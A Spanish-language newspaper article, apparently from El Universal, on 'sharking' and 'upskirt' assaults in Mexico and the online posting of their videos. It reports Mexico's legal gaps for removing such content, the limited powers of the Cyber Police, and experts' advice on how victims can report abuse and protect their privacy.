La denuncia en el MP se puede iniciar en línea con una solicitud de cita. Entonces me envían un correo con los requisitos y la fecha de la cita en las oficinas de la colonia Escandón. Al presentar las pruebas, que consistían en pantallazos del sitio, me enviaron al correo el folio de denuncia. El funcionario de la oficina explica que “hay una probabilidad muy amplia” de que mi denuncia “no llegue a nada”, pues se requiere de varias quejas que sustenten el delito.

“Si usted tiene más testigos, o puede traer a dos o tres personas más a que denuncien este sitio, nosotros lo pasamos a la Policía Cibernética para que procedan”, dice el agente del MP.

Pero al consultar nuevamente al encargado de la Policía Cibernética, regresamos al inicio: la dependencia no tiene poder para cerrar el sitio, sino para hacerle una recomendación.

“Lamentablemente es una zona gris, aún no hay fundamentos suficientes, pero se encuentra al responsable, al administrador de la página, y se le exhorta a eliminar ese contenido o el sitio completo”, explica el funcionario.

La otra policía: redes sociales

Juan Carlos Solís, experto en ciberseguridad y redes, asegura que en México la legislación respecto a lo que sucede en la red está atrasada. “No existe, por ejemplo, el derecho de eliminación como en Europa, donde tú tienes el derecho de pedir a una compañía que elimine contenido sobre tu persona que no hayas autorizado, y por ley lo tienen que hacer”, explica.

Solís considera que la única solución “por ahora” es la de apelar a la comunidad.

“Hay que interponer una denuncia porque es un paso muy importante, pero las compañías no son obligadas a eliminar contenido como upskirt o sharking. La opción por ahora es la de apelar a la comunidad a que comenten, a que denuncien en Facebook o Twitter, para que la página sea bloqueada o el contenido eliminado”, dice el experto.

Esa fue la única opción de la periodista Andrea Noel: volcarse a Twitter a pedir que el ataque del que fue víctima fuera compartido. Sólo así, explicó, logró atraer la atención de las autoridades en México.

“Si alguien reconoce a este imbécil, favor de identificarlo.Women should be able to walk safely. #FelizDiaDeLaMujer”, escribió Noel el 8 de marzo pasado, minutos después de haber sido víctima de sharking.

Luego de intentar con distintas autoridades, esa fue su única opción: apelar a las redes sociales, al trending, a lo viral. Aunque después sufrió las consecuencias: el acoso cibernético en su contra fue tal que tuvo que dejar el país.

La firma internacional en ciberseguridad, International Institute of Cyber Security, con oficinas en la Ciudad de México, ha estado al tanto de los casos de sharking.

David Thomas, especialista de la empresa, dijo en entrevista con EL UNIVERSAL que existen medidas personales que una víctima puede tomar en contra de este tipo de sitios.

“La víctima debe seguir cuatro o cinco pasos: primero, guardar el sitio web que contiene su imagen/video y anotar la dirección completa de la página; segundo, tomar una captura de pantalla, eso servirá como evidencia en caso de que presente una denuncia más tarde con la policía; tercero, buscar en el sitio a reportar el enlace/sección de Reportar Abuso (Report Abuse). La víctima debe presentar un informe en esa sección, adjuntando su foto e identificación válida. El segundo requisito es muy importante, ya que ayuda a las empresas a verificar su solicitud y a tomar acción inmediatamente”, explica Thomas.

El experto agrega que de no encontrar la sección Reportar Abuso, se intente comunicar con el sitio web a través de la sección Contacto y pedirles que eliminen el contenido.

Del dicho al hecho

México ocupa el tercer lugar en el mundo en delitos cibernéticos, de acuerdo con un informe de la Organización para la Cooperación y el Desarrollo Económicos (OCDE). Ante esto se creó la Policía Cibernética. Durante el anuncio oficial de dicha dependencia, el entonces titular de la Secretaría de Seguridad Pública capitalina, Jesús Rodríguez Almeida, anunció que este tipo de sitios podrían ser bloqueados.

“Este nuevo modelo podrá bloquear y cancelar todas aquellas páginas que pongan en riesgo y promuevan la comisión de algún delito”, dijo entonces el funcionario. Esto, según se explicó, debido al trabajo conjunto de la dependencia con la Unidad de Investigación Cibernética de la Procuraduría capitalina.

En 2014, a un año de instaurada la dependencia, se cerraron 15 sitios, en su mayoría fraudulentos y de pornografía infantil. En 2015, de acuerdo con el informe anual de la policía capitalina, la Unidad de Ciberdelincuencia Preventiva cerró 44 sitios por las mismas razones.

No obstante, foros como VoyeurAzteca y otros sitios pornográficos no han sido bloqueados, unos por estar fuera de México y otros por un vacío legal como estar conformados como “foros” y no como sitios pornográficos.

Además, de acuerdo con el funcionario de la Policía Cibernética, las denuncias por sharking y upskirt son difíciles de definir a la hora de saber a qué dependencia acudir.

Ambos ataques sexuales tienen dos vertientes: el físico, en elsharking sucede cuando la mujer es atacada para bajar sus calzoncillos; en el upskirt ocurre mientras un individuo graba por debajo de su falda, y el cibernético, que en ambos casos sucede cuando alguien publica videos del ataque en internet.

Para evitar ser víctima de sharking o de upskirt, expertos recomiendan asegurarse de que la configuración de privacidad en redes sociales como Facebook e Instagram esté siempre activa para evitar que los contenidos sean accesible a cualquier persona.

Ser cuidadoso en la manera en que se comparten datos personales a través de Facebook o WhatsApp; evitar revisar correo personal en cibercafés o con wifi público, y estar atento en tiendas de ropa sobre cámaras ocultas.

Fuente:http://www.eluniversal.com.mx/